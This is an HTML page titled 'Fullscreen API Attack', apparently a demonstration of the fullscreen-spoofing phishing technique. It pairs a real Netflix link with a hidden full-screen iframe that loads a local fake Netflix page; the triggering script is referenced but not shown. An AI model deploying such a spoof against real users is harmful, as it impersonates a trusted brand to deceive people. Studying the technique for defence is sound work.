<!DOCTYPE html>
<html class="no-js" lang="en">
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <title>Fullscreen API Attack</title>
    <meta name="description" content="" />

    <style>
      /* Thêm style để iframe chiếm toàn bộ không gian */
      #spoofSite {
        overflow: hidden;
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        display: none; /* Ẩn ban đầu */
      }
      #spoofSite iframe {
        width: 100%;
        height: 100%;
        border: none;
      }

      /* Style cho popup group info */
      .group-info-popup {
        display: none;
        position: fixed;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        width: 80%;
        max-width: 600px;
        background: white;
        z-index: 2000;
        border-radius: 10px;
        box-shadow: 0 5px 25px rgba(0, 0, 0, 0.3);
      }

      .group-info-iframe {
        width: 100%;
        height: 400px;
        border: none;
        border-radius: 0 0 10px 10px;
      }

      .popup-header {
        background: #2c3e50;
        color: white;
        padding: 15px;
        border-radius: 10px 10px 0 0;
        display: flex;
        justify-content: space-between;
        align-items: center;
      }

      .close-popup {
        background: #ff5f57;
        color: white;
        border: none;
        border-radius: 50%;
        width: 30px;
        height: 30px;
        cursor: pointer;
        font-size: 16px;
        line-height: 1;
      }
    </style>
  </head>
  <body>
    <a class="spoofLink" href="https://www.netflix.com/vn/"
      >Netflix</a
    >

    <div id="spoofSite">
      <!-- Thay thế hình ảnh bằng iframe tải NetflixDemo.html -->
      <iframe src="/netflix_static.html" id="netflixFrame"></iframe>
    </div>

  

    <script src="js/libs/jquery-1.7.2.js"></script>
    <script src="js/libs/jquery-ui-1.8.18.custom.min.js"></script>
    <script src="js/libs/facebox.js"></script>
    <script src="js/libs/browser-detect.js"></script>
    <script src="js/libs/fullscreen-api-shim.js"></script>

    <script src="js/script.js"></script>

    
  </body>
</html>
